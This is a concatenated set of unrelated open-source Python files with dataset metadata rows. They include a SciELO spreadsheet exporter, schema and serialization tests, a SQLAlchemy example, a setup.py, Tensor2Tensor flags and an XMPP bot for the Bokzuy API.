sheet2 = pyexcel.get_sheet(
file_name='data/scielo/rotulos_avaliacao_fapesp_abel.xlsx',
sheet_name='rotulos_dados_periodicos',
name_columns_by_row=0)
sheet2_json = sheet2.to_records()
worksheet2.write(0, 0, 'Rótulo', formatline)
worksheet2.write(0, 1, 'Descrição', formatline)
row = 1
for line in sheet2_json:
col = 0
worksheet2.write(row, col, line['rotulo_portugues'], formatline)
col += 1
worksheet2.write(row, col, line['descricao'], formatline)
row += 1
    # Write the Excel spreadsheet to disk
workbook.close()
def alljournals():
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__fullset=1)
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliação-SciELO-todos-' + today + '.xlsx'
sheetname = 'SciELO-todos'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-todos-AT.xlsx'
journal(
query=scielo,
filename=filename,
sheetname=sheetname,
issn=None,
atfile=atfile)
def activethisyear():
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__activethisyear=1)
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliação-SciELO-ativos2018-' + today + '.xlsx'
sheetname = 'SciELO-ativos2018'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-AT.xlsx'
journal(
query=scielo,
filename=filename,
sheetname=sheetname,
issn=None,
atfile=atfile)
# Active this year and included before 2016
def activethisyear_inclusion_before():
    # already takes into account:
# title_current_status='current'
# collection='scl'
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__evaluated=1)
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliação-SciELO-ativos2018-até2015-' + today + '.xlsx'
sheetname = 'SciELO-ativos2018-ate2015'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-até2015-AT.xlsx'
journal(
query=scielo,
filename=filename,
sheetname=sheetname,
issn=None,
atfile=atfile)
def onejournal():
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__evaluated=1)
counter = 0
for j in scielo:
counter += 1
issn = j['issn_scielo']
queryj = models.Scielofapesp.objects.filter(issn_list=issn)
short_title = accent_remover(j['short_title_scielo'])
title = re.sub(r'[\[\]:*?/\\]', "", short_title)
# acronym = j['api']['acronym']
print(title.lower())
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliacao-SciELO-' + issn + '-' + today + '.xlsx'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-até2015-AT-import.xlsx'
journal(
query=queryj,
filename=filename,
sheetname=title[0:30],
issn=issn,
atfile=atfile)
print(counter)
    # MIOC test (commented-out single-journal example)
# queryj = models.Scielofapesp.objects.filter(issn_list='0074-0276')
# issn = '0074-0276'
# filename = 'avaliacao_scielo_'+issn+'.xlsx'
# sheetname = 'Mem. Inst. Oswaldo Cruz'
# atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-até2015-AT.xlsx'
# journal(query=queryj, filename=filename, sheetname=sheetname, issn=issn, atfile=atfile)
def main():
    # All journals in the SciELO collection (fullset)
# alljournals()
    # Active in 2018 (activethisyear)
# activethisyear()
    # Before 2016 (evaluated)
# activethisyear_inclusion_before()
    # Before 2016 (evaluated) - one spreadsheet per journal
onejournal()
if __name__ == "__main__":
main()
| bsd-2-clause | -1,299,251,792,692,191,500 | 35.709705 | 93 | 0.407071 | false |
xethorn/sukimu | tests/test_schema.py | 1 | 4130 | from unittest import mock
import pytest
from oto import response
from oto import status
from sukimu import fields
from sukimu import operations
from sukimu import schema
def create_schema(fields=None, indexes=None):
table = schema.Table('TableName')
indexes = indexes or set()
fields = fields or dict()
return schema.Schema(table, *indexes, **fields)
def test_create_schema(monkeypatch):
table = schema.Table('TableName')
s = schema.Schema(table)
assert isinstance(s, schema.Schema)
assert s.table is table
assert table.schema == s
def test_create_schema_with_fields():
table = schema.Table('TableName')
s = schema.Schema(table, id=fields.Field())
assert isinstance(s.fields_dependencies.get('id'), list)
assert len(s.indexes) == 0
def test_create_schema_with_indexes(monkeypatch):
table = schema.Table('TableName')
index = schema.Index('id')
monkeypatch.setattr(table, 'add_index', mock.MagicMock())
s = schema.Schema(table, index)
assert len(s.indexes) == 1
assert table.add_index.called
def test_field_validation_on_create():
s = create_schema(fields=dict(
id=fields.Field(),
username=fields.Field(required=True)))
# operation is mandatory
with pytest.raises(Exception):
s.validate({})
resp = s.validate({'id': 'test'}, operations.CREATE)
assert resp.status is status.BAD_REQUEST
assert resp.errors.get('message').get('username')
assert not resp.errors.get('message').get('id')
resp = s.validate({'username': 'test'}, operations.CREATE)
assert resp.status is status.OK
resp = s.validate({}, operations.READ)
assert resp.status is status.OK
def test_field_validation_on_read():
s = create_schema(fields=dict(
id=fields.Field(),
username=fields.Field(required=True)))
resp = s.validate(
{'username': 'foo', 'unknownfield': 'value'}, operations.READ)
assert resp.status is status.OK
assert not resp.message.get('unknownfield')
# Fields to validate should be a dictionary of format:
# <field name, value>
with pytest.raises(Exception):
s.validate([], operations.READ)
@pytest.fixture
def full_schema():
return create_schema(
indexes=[
schema.Index('id'),
schema.Index('id', 'username')],
fields=dict(
id=fields.Field(),
username=fields.Field(required=True)))
def test_ensure_index(monkeypatch, full_schema):
# If the validation_response is not the rigt object, throws an exception.
with pytest.raises(Exception):
full_schema.ensure_indexes(object())
error_response = response.Response(status=status.BAD_REQUEST)
assert full_schema.ensure_indexes(error_response) is error_response
data = dict(id='id-value', username='username-value')
fetch_one = mock.MagicMock(return_value=error_response)
success_response = response.Response(data)
monkeypatch.setattr(full_schema, 'fetch_one', fetch_one)
resp = full_schema.ensure_indexes(success_response)
assert resp
fetch_one.return_value = success_response
resp = full_schema.ensure_indexes(success_response)
assert not resp
assert 'id' in resp.errors.get('message')
assert 'username' in resp.errors.get('message')
def test_extensions(full_schema):
@full_schema.extension('stats')
def stats(item, fields):
return
assert full_schema.extensions.get('stats')
def test_decorating_with_extension(full_schema):
"""Test decorating with an extension.
"""
spy = mock.MagicMock()
item = {'id': 'foo'}
context = {'value': 'context_value'}
fields = {'extension_name': ['foo']}
extension_name = 'extension_name'
@full_schema.extension(extension_name)
def stats(item, fields, context=None):
spy(item, fields, context)
return context.get('value')
response = full_schema.decorate(item, fields=fields, context=context)
spy.assert_called_with(item, ['foo'], context)
assert spy.called
assert response.get(extension_name) == context.get('value')
| mit | 6,177,569,530,216,235,000 | 28.29078 | 77 | 0.672639 | false |
spaus/pysandbox | sqltests.py | 1 | 2443 | import os
import sys
from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
person_id = Column(Integer, ForeignKey('person.id'))
person = relationship(Person)
def createExampleDB(BaseClass):
# Create an engine that stores data in the local directory's
# sqlalchemy_example.db file.
engine = create_engine('sqlite:///sqlalchemy_example.db')
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
BaseClass.metadata.create_all(engine)
def addRecords(BaseClass):
engine = create_engine('sqlite:///sqlalchemy_example.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
BaseClass.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person = Person(name='new person')
session.add(new_person)
session.commit()
# Insert an Address in the address table
new_address = Address(post_code='00000', person=new_person)
session.add(new_address)
session.commit()
# createExampleDB(Base)
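# Usage note (sketch): createExampleDB(Base) must have been run at least once so
# that the tables exist before addRecords(Base) inserts rows; the inserted rows
# could then be read back with e.g. session.query(Person).all() on a new session.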
addRecords(Base) | mit | -8,484,875,581,494,622,000 | 34.42029 | 76 | 0.722882 | false |
diacritica/bokzuyXMPPbot | bokzuy_bot.py | 1 | 5842 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
bokzuyXMPPbot: Your dummy XMPP bot for Bokzuy.com
Copyright (C) 2012 Pablo Ruiz Múzquiz
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
import json
import sleekxmpp
import requests
from optparse import OptionParser
# Make sure we use UTF-8 by default even with python < 3.0.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf8')
else:
raw_input = input
class EchoBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot for Bokzuy that will follow orders
such as listing friends, badges and sending bokies.
Based on the SleekXMPP bot.
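    Chat commands (summary of the message() handler below):
      "b"  -> list the available badges
      "f"  -> list friends
      "<badgeId>@<userId>@<comment>" or "<badgeId>@<userId>@<comment>@<group>"
           -> send a boky with the given badge to the given user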
"""
def __init__(self, jid, password, bokzuy_auth):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.add_event_handler("session_start", self.start)
self.add_event_handler("message", self.message)
self.bokzuy_auth = bokzuy_auth
def start(self, event):
self.send_presence()
self.get_roster()
def message(self, msg):
"""
Process incoming message stanzas. Be aware that this also
includes MUC messages and error messages. It is usually
        a good idea to check the message's type before processing
or sending replies.
Arguments:
msg -- The received message stanza. See the documentation
for stanza objects and the Message stanza to see
how it may be used.
"""
if msg['type'] in ('chat', 'normal'):
msgstr = "%(body)s" % msg
if msgstr == "b":
result = self.get_badges()
resultdict = json.loads(result)
resultlist = ["%i - %s" % (badge["id"], badge["name"]) for \
badge in resultdict["badges"]]
resultlist.sort()
resultstr = "\n".join(resultlist)
elif msgstr == "f":
result = self.get_friends()
resultdict = json.loads(result)
resultlist = ["%i - %s" % (friend[u"id"], friend[u"name"]) for\
friend in resultdict[u"friends"]]
resultlist.sort()
resultstr = "\n".join(resultlist)
else:
try:
if msgstr.count("@") == 3:
badgeid, userid, comment, group = msgstr.split("@")
else:
group = ""
badgeid, userid, comment = msgstr.split("@")
result = self.send_boky(int(badgeid), int(userid), \
comment, group)
resultstr = json.loads(result)["msg"]
except:
resultstr = "This bot is away or you made a mistake"
msg.reply(resultstr).send()
def send_boky(self, badgeid=1, userid=10, \
comment="API TEST THROUGH XMPP BOT :)", group="kaleidos"):
params = {
'badgeId': badgeid,
'comment': comment,
'group': group,
}
response = requests.post("https://api.bokzuy.com/%s/bokies" % \
(userid), data=params, auth=self.bokzuy_auth, verify=False)
return response.content
def get_badges(self):
response = requests.get("https://api.bokzuy.com/badges",\
auth=self.bokzuy_auth, verify=False)
return response.content
def get_friends(self):
response = requests.get("https://api.bokzuy.com/me/friends",\
auth=self.bokzuy_auth, verify=False)
return response.content
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
# Bokzuy user and password options.
optp.add_option("-b", "--bokid", dest="bokzuy_username",
help="Bokzuy user to use")
optp.add_option("-w", "--bokpass", dest="bokzuy_password",
help="Bokzuy password to use")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
if opts.bokzuy_username is None:
opts.bokzuy_username = raw_input("Bokzuy username: ")
if opts.bokzuy_password is None:
opts.bokzuy_password = getpass.getpass("Bokzuy password: ")
bokzuy_auth = (opts.bokzuy_username, opts.bokzuy_password)
xmpp = EchoBot(opts.jid, opts.password, bokzuy_auth)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0004') # Data Forms
xmpp.register_plugin('xep_0060') # PubSub
xmpp.register_plugin('xep_0199') # XMPP Ping
if xmpp.connect(('talk.google.com', 5222)):
#xmpp.process(block=True)
xmpp.process(threaded=False)
print("Done!")
else:
print("Unable to connect.")
| gpl-2.0 | -1,316,866,664,008,892,200 | 31.270718 | 79 | 0.564287 | false |
coderatchet/scrapy-test | setup.py | 1 | 1740 | #!/usr/bin/python
# -*- coding: utf-8 -*- #
"""
setup.py
Copyright 2017 CodeRatchet
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
"""
from setuptools import setup, find_packages
from scrapytest import __version__
import sys
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
setup(
name="scrapytest",
version=__version__,
description='A Test for assessing developer\'s proficiency',
url='https://github.com/coderatchet/scrapt-test.git',
long_description=open("README.md").read(),
download_url='https://github.com/coderatchet/scrapytest/archive/' + __version__ + '.tar.gz',
license='Apache 2.0',
author='CodeRatchet',
author_email='[email protected]',
maintainer='Jared Nagle',
maintainer_email='[email protected]',
classifiers=[
'Development Status :: 1 - Planning',
'Environment :: Console',
'License :: OSI Approved',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.5',
'Topic :: Text Processing :: Markup :: HTML'
],
platforms=['any'],
packages=find_packages(),
include_package_data=True,
install_requires=['scrapy>=1.3.2', 'pyasn1', 'pymongo', 'mongoengine>=0.1.1'],
tests_require=['psutil', 'pytest'],
# empty array for now
setup_requires=[] + pytest_runner
)
| apache-2.0 | 38,268,766,462,424,410 | 31.830189 | 96 | 0.645402 | false |
alexey-grom/django-userflow | userflow/views/verify/request.py | 1 | 1109 | # encoding: utf-8
from django.http.response import HttpResponseRedirect, Http404
from django.views.generic.detail import DetailView
from userflow.models import UserEmail
class RequestConfirmEmailView(DetailView):
model = UserEmail
def get_queryset(self):
return super(RequestConfirmEmailView, self).get_queryset().inactive()
def get_object(self, queryset=None):
object = super(RequestConfirmEmailView, self).get_object(queryset)
if object.user != self.request.user:
if object.user.is_active:
raise Http404
confirmation = object.confirmations.\
unfinished().\
first()
if not confirmation:
from userflow.models import EmailConfirmation
confirmation = EmailConfirmation.objects.create(email=object)
return confirmation
def render_to_response(self, context, **response_kwargs):
self.object.send('verify',
self.object.get_owner(),
self.request)
return HttpResponseRedirect(self.object.get_wait_url())
| mit | 1,387,404,666,578,132,700 | 33.65625 | 77 | 0.655546 | false |
tensorflow/tensor2tensor | tensor2tensor/utils/flags.py | 1 | 6431 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common command-line flags."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_bool("registry_help", False,
"If True, logs the contents of the registry and exits.")
flags.DEFINE_bool("tfdbg", False,
"If True, use the TF debugger CLI on train/eval.")
flags.DEFINE_bool("export_saved_model", False,
"DEPRECATED - see serving/export.py.")
flags.DEFINE_bool("dbgprofile", False,
"If True, record the timeline for chrome://tracing/.")
flags.DEFINE_string("model", None, "Which model to use.")
flags.DEFINE_string("hparams_set", None, "Which parameters to use.")
flags.DEFINE_string("hparams_range", None, "Parameters range.")
flags.DEFINE_string("hparams", "",
"A comma-separated list of `name=value` hyperparameter "
"values. This flag is used to override hyperparameter "
"settings either when manually selecting hyperparameters "
"or when using Vizier. If a hyperparameter setting is "
"specified by this flag then it must be a valid "
"hyperparameter name for the model.")
flags.DEFINE_string("problem", None, "Problem name.")
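# Example override for --hparams above (hypothetical names/values):
#   --hparams='batch_size=1024,learning_rate=0.1'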
# data_dir is a common flag name - catch conflicts and define it once.
try:
flags.DEFINE_string("data_dir", None, "Directory with training data.")
except: # pylint: disable=bare-except
pass
flags.DEFINE_integer("train_steps", 250000,
"The number of steps to run training for.")
flags.DEFINE_string("eval_early_stopping_metric", "loss",
"If --eval_early_stopping_steps is not None, then stop "
"when --eval_early_stopping_metric has not decreased for "
"--eval_early_stopping_steps")
flags.DEFINE_float("eval_early_stopping_metric_delta", 0.1,
"Delta determining whether metric has plateaued.")
flags.DEFINE_integer("eval_early_stopping_steps", None,
"If --eval_early_stopping_steps is not None, then stop "
"when --eval_early_stopping_metric has not decreased for "
"--eval_early_stopping_steps")
flags.DEFINE_bool("eval_early_stopping_metric_minimize", True,
"Whether to check for the early stopping metric going down "
"or up.")
flags.DEFINE_integer("eval_timeout_mins", 240,
"The maximum amount of time to wait to wait between "
"checkpoints. Set -1 to wait indefinitely.")
flags.DEFINE_bool("eval_run_autoregressive", False,
"Run eval autoregressively where we condition on previous"
"generated output instead of the actual target.")
flags.DEFINE_bool("eval_use_test_set", False,
"Whether to use the '-test' data for EVAL (and PREDICT).")
flags.DEFINE_integer("keep_checkpoint_max", 20,
"How many recent checkpoints to keep.")
flags.DEFINE_bool("enable_graph_rewriter", False,
"Enable graph optimizations that are not on by default.")
flags.DEFINE_integer("keep_checkpoint_every_n_hours", 10000,
"Number of hours between each checkpoint to be saved. "
"The default value 10,000 hours effectively disables it.")
flags.DEFINE_integer("save_checkpoints_secs", 0,
"Save checkpoints every this many seconds. "
"Default=0 means save checkpoints each x steps where x "
"is max(iterations_per_loop, local_eval_frequency).")
flags.DEFINE_bool("log_device_placement", False,
"Whether to log device placement.")
flags.DEFINE_string("warm_start_from", None, "Warm start from checkpoint.")
# Distributed training flags
flags.DEFINE_integer("local_eval_frequency", 1000,
"Save checkpoints and run evaluation every N steps during "
"local training.")
flags.DEFINE_integer("eval_throttle_seconds", 600,
"Do not re-evaluate unless the last evaluation was started"
" at least this many seconds ago.")
flags.DEFINE_bool("sync", False, "Sync compute on PS.")
flags.DEFINE_string("worker_job", "/job:localhost", "name of worker job")
flags.DEFINE_integer("worker_gpu", 1, "How many GPUs to use.")
flags.DEFINE_integer("worker_replicas", 1, "How many workers to use.")
flags.DEFINE_integer("worker_id", 0, "Which worker task are we.")
flags.DEFINE_float("worker_gpu_memory_fraction", 0.95,
"Fraction of GPU memory to allocate.")
flags.DEFINE_integer("ps_gpu", 0, "How many GPUs to use per ps.")
flags.DEFINE_string("gpu_order", "", "Optional order for daisy-chaining GPUs."
" e.g. \"1 3 2 4\"")
flags.DEFINE_string("ps_job", "/job:ps", "name of ps job")
flags.DEFINE_integer("ps_replicas", 0, "How many ps replicas.")
# Decoding flags
flags.DEFINE_string("decode_hparams", "",
"Comma-separated list of name=value pairs to control "
"decode behavior. See decoding.decode_hparams for "
"defaults.")
flags.DEFINE_string("decode_from_file", "",
"Path to the source file for decoding, used by "
"continuous_decode_from_file.")
flags.DEFINE_string("decode_to_file", "",
"Path to the decoded file generated by decoding, used by "
"continuous_decode_from_file.")
flags.DEFINE_string("decode_reference", "",
"Path to the reference file for decoding, used by "
"continuous_decode_from_file to compute BLEU score.")
| apache-2.0 | -5,781,691,177,619,446,000 | 50.862903 | 80 | 0.636759 | false |
JudoWill/glue | glue/core/tests/test_state.py | 1 | 13000 | from __future__ import absolute_import, division, print_function
import numpy as np
import json
import pytest
from ..state import (GlueSerializer, GlueUnSerializer,
saver, loader, VersionedDict)
from ...external import six
from ... import core
from ...qt.glue_application import GlueApplication
from ...qt.widgets.scatter_widget import ScatterWidget
from ...qt.widgets.image_widget import ImageWidget
from ...qt.widgets.histogram_widget import HistogramWidget
from .util import make_file
from ..data_factories import load_data
from ..data_factories.tests.test_data_factories import TEST_FITS_DATA
from io import BytesIO
from ...tests.helpers import requires_astropy
def clone(object, include_data=False):
gs = GlueSerializer(object, include_data=include_data)
oid = gs.id(object)
dump = gs.dumps()
gu = GlueUnSerializer.loads(dump)
result = gu.object(oid)
return result
def doubler(x):
return 2 * x
def containers_equal(c1, c2):
"""Check that two container-like items have the same contents,
ignoring differences relating to the type of container
"""
if isinstance(c1, six.string_types):
return c1 == c2
try:
for a, b in zip(c1, c2):
if not containers_equal(a, b):
return False
if isinstance(c1, dict) and isinstance(c2, dict):
if not containers_equal(c1[a], c2[b]):
return False
except TypeError:
pass
return True
class Cloner(object):
def __init__(self, obj):
self.s = GlueSerializer(obj)
self.us = GlueUnSerializer.loads(self.s.dumps())
def get(self, o):
return self.us.object(self.s.id(o))
class Circular(object):
def __gluestate__(self, context):
return dict(other=context.id(self.other))
@classmethod
def __setgluestate__(cls, rec, context):
result = cls()
yield result
result.other = context.object(rec['other'])
def test_generator_loaders():
f = Circular()
b = Circular()
f.other = b
b.other = f
f2 = clone(f)
assert f2.other.other is f2
def test_none():
assert clone(None) is None
def test_data():
d = core.Data(x=[1, 2, 3], label='testing')
d2 = clone(d)
assert d2.label == 'testing'
np.testing.assert_array_equal(d2['x'], [1, 2, 3])
np.testing.assert_array_equal(d2['Pixel Axis 0'], [0, 1, 2])
def test_data_style():
d = core.Data(x=[1, 2, 3])
d.style.color = 'blue'
d2 = clone(d)
assert d2.style.color == 'blue'
@requires_astropy
def test_data_factory():
with make_file(TEST_FITS_DATA, '.fits', decompress=True) as infile:
d = load_data(infile)
d2 = clone(d)
np.testing.assert_array_equal(d['PRIMARY'], d2['PRIMARY'])
@requires_astropy
def test_data_factory_include_data():
with make_file(TEST_FITS_DATA, '.fits', decompress=True) as infile:
d = load_data(infile)
d2 = clone(d, include_data=True)
np.testing.assert_array_equal(d['PRIMARY'], d2['PRIMARY'])
def test_save_numpy_scalar():
assert clone(np.float32(5)) == 5
@requires_astropy
def tests_data_factory_double():
# ensure double-cloning doesn't somehow lose lightweight references
from astropy.io import fits
d = np.random.normal(0, 1, (100, 100, 100))
s = BytesIO()
fits.writeto(s, d)
with make_file(s.getvalue(), '.fits') as infile:
d = load_data(infile)
d2 = clone(d)
assert len(GlueSerializer(d).dumps()) < \
1.1 * len(GlueSerializer(d2).dumps())
def test_inequality_subset():
d = core.Data(x=[1, 2, 3], label='testing')
s = d.new_subset(label='abc')
s.subset_state = d.id['x'] > 1
d2 = clone(d)
s2 = d2.subsets[0]
assert s.label == s2.label
np.testing.assert_array_equal(s2.to_mask(), [False, True, True])
assert s.style == s2.style
def test_compound_state():
d = core.Data(x=[1, 2, 3])
s = d.new_subset(label='abc')
s.subset_state = (d.id['x'] > 2) | (d.id['x'] < 1.5)
d2 = clone(d)
np.testing.assert_array_equal(d2.subsets[0].to_mask(), [True, False, True])
def test_empty_subset():
d = core.Data(x=[1, 2, 3], label='testing')
s = d.new_subset(label='abc')
s.style.color = 'blue'
s2 = clone(s)
assert s.style == s2.style
assert s2.style.color == 'blue'
def test_box_roi_subset():
d = core.Data(x=[1, 2, 3], y=[2, 4, 8])
s = d.new_subset(label='box')
roi = core.roi.RectangularROI(xmin=1.1, xmax=2.1, ymin=2.2, ymax=4.2)
s.subset_state = core.subset.RoiSubsetState(xatt=d.id['x'],
yatt=d.id['y'], roi=roi)
d2 = clone(d)
np.testing.assert_array_equal(
d2.subsets[0].to_mask(), [False, True, False])
def test_range_subset():
d = core.Data(x=[1, 2, 3])
s = d.new_subset(label='range')
s.subset_state = core.subset.RangeSubsetState(0.5, 2.5, att=d.id['x'])
d2 = clone(d)
np.testing.assert_array_equal(
d2.subsets[0].to_mask(), [True, True, False])
def test_complex_state():
d = core.Data(x=[1, 2, 3], y=[2, 4, 8])
s = d.new_subset(label='test')
s.subset_state = (d.id['x'] > 2) | (d.id['y'] < 4)
s.subset_state = s.subset_state & (d.id['x'] < 4)
d2 = clone(d)
s2 = d2.subsets[0]
np.testing.assert_array_equal(s2.to_mask(), [True, False, True])
def test_range_roi():
roi = core.roi.RangeROI('x', min=1, max=2)
r2 = clone(roi)
assert r2.ori == 'x'
assert r2.min == 1
assert r2.max == 2
def test_circular_roi():
roi = core.roi.CircularROI(xc=0, yc=1, radius=2)
r2 = clone(roi)
assert r2.xc == 0
assert r2.yc == 1
assert r2.radius == 2
def test_polygonal_roi():
roi = core.roi.PolygonalROI()
roi.add_point(0, 0)
roi.add_point(0, 1)
roi.add_point(1, 0)
r2 = clone(roi)
assert r2.vx == [0, 0, 1]
assert r2.vy == [0, 1, 0]
def check_clone_app(app):
c = Cloner(app)
copy = c.us.object('__main__')
hub1 = app.session.hub
hub2 = copy.session.hub
assert len(hub1._subscriptions) == len(hub2._subscriptions)
# data collections are the same
for d1, d2 in zip(app.session.data_collection,
copy.session.data_collection):
assert d1.label == d2.label
for cid1, cid2 in zip(d1.components, d2.components):
assert cid1.label == cid2.label
# order of components unspecified if label collisions
cid2 = c.get(cid1)
np.testing.assert_array_almost_equal(d1[cid1, 0:1],
d2[cid2, 0:1], 3)
# same data viewers, in the same tabs
for tab1, tab2 in zip(app.viewers, copy.viewers):
assert len(tab1) == len(tab2)
for v1, v2 in zip(tab1, tab2):
assert type(v1) == type(v2)
# same window properties
assert v1.viewer_size == v2.viewer_size
assert v1.position == v2.position
# same viewer-level properties (axis label, scaling, etc)
assert set(v1.properties.keys()) == set(v2.properties.keys())
for k in v1.properties:
if hasattr(v1.properties[k], 'label'):
assert v1.properties[k].label == v2.properties[k].label
else:
assert v1.properties[k] == v2.properties[k] or \
containers_equal(v1.properties[k], v2.properties[k])
assert len(v1.layers) == len(v2.layers)
for l1, l2 in zip(v1.layers, v2.layers):
assert l1.layer.label == l2.layer.label # same data/subset
assert l1.layer.style == l2.layer.style
return copy
class TestApplication(object):
def check_clone(self, app):
return check_clone_app(app)
def test_bare_application(self):
app = GlueApplication()
self.check_clone(app)
def test_data_application(self):
dc = core.DataCollection([core.Data(label='test',
x=[1, 2, 3], y=[2, 3, 4])])
app = GlueApplication(dc)
self.check_clone(app)
def test_links(self):
d1 = core.Data(label='x', x=[1, 2, 3])
d2 = core.Data(label='y', y=[3, 4, 8])
dc = core.DataCollection([d1, d2])
link = core.ComponentLink([d1.id['x']], d2.id['y'], doubler)
dc.add_link(link)
np.testing.assert_array_equal(d1['y'], [2, 4, 6])
app = GlueApplication(dc)
self.check_clone(app)
def test_scatter_viewer(self):
d = core.Data(label='x', x=[1, 2, 3, 4, 5], y=[2, 3, 4, 5, 6])
dc = core.DataCollection([d])
app = GlueApplication(dc)
w = app.new_data_viewer(ScatterWidget, data=d)
self.check_clone(app)
s1 = dc.new_subset_group()
s2 = dc.new_subset_group()
assert len(w.layers) == 3
l1, l2, l3 = w.layers
l1.zorder, l2.zorder = l2.zorder, l1.zorder
l3.visible = False
assert l3.visible is False
copy = self.check_clone(app)
assert copy.viewers[0][0].layers[-1].visible is False
def test_multi_tab(self):
d = core.Data(label='hist', x=[[1, 2], [2, 3]])
dc = core.DataCollection([d])
app = GlueApplication(dc)
w1 = app.new_data_viewer(HistogramWidget, data=d)
app.new_tab()
w2 = app.new_data_viewer(HistogramWidget, data=d)
assert app.viewers == ((w1,), (w2,))
self.check_clone(app)
def test_histogram(self):
d = core.Data(label='hist', x=[[1, 2], [2, 3]])
dc = core.DataCollection([d])
app = GlueApplication(dc)
w = app.new_data_viewer(HistogramWidget, data=d)
self.check_clone(app)
dc.new_subset_group()
assert len(w.layers) == 2
self.check_clone(app)
w.nbins = 7
self.check_clone(app)
def test_subset_groups_remain_synced_after_restore(self):
        # regression test for 352
d = core.Data(label='hist', x=[[1, 2], [2, 3]])
dc = core.DataCollection([d])
dc.new_subset_group()
app = GlueApplication(dc)
app2 = clone(app)
sg = app2.data_collection.subset_groups[0]
assert sg.style.parent is sg
sg.style.color = '#112233'
assert sg.subsets[0].style.color == '#112233'
class DummyClass(object):
pass
class TestVersioning(object):
def setup_method(self, method):
@saver(DummyClass, version=1)
def s(d, context):
return dict(v=3)
@loader(DummyClass, version=1)
def l(d, context):
return 3
@saver(DummyClass, version=2)
def s(d, context):
return dict(v=4)
@loader(DummyClass, version=2)
def l(rec, context):
return 4
def teardown_method(self, method):
GlueSerializer.dispatch._data[DummyClass].pop(1)
GlueSerializer.dispatch._data[DummyClass].pop(2)
GlueUnSerializer.dispatch._data[DummyClass].pop(1)
GlueUnSerializer.dispatch._data[DummyClass].pop(2)
def test_default_latest_save(self):
assert list(GlueSerializer(DummyClass()).dumpo().values())[0]['v'] == 4
assert list(GlueSerializer(DummyClass()).dumpo().values())[0]['_protocol'] == 2
def test_legacy_load(self):
data = json.dumps({'': {'_type': 'glue.core.tests.test_state.DummyClass',
'_protocol': 1, 'v': 2}})
assert GlueUnSerializer(data).object('') == 3
def test_default_earliest_load(self):
data = json.dumps({'': {'_type': 'glue.core.tests.test_state.DummyClass'}})
assert GlueUnSerializer(data).object('') == 3
class TestVersionedDict(object):
def test_bad_add(self):
d = VersionedDict()
with pytest.raises(KeyError):
d['nonsequential', 2] = 5
def test_get(self):
d = VersionedDict()
d['key', 1] = 5
d['key', 2] = 6
d['key', 3] = 7
assert d['key'] == (7, 3)
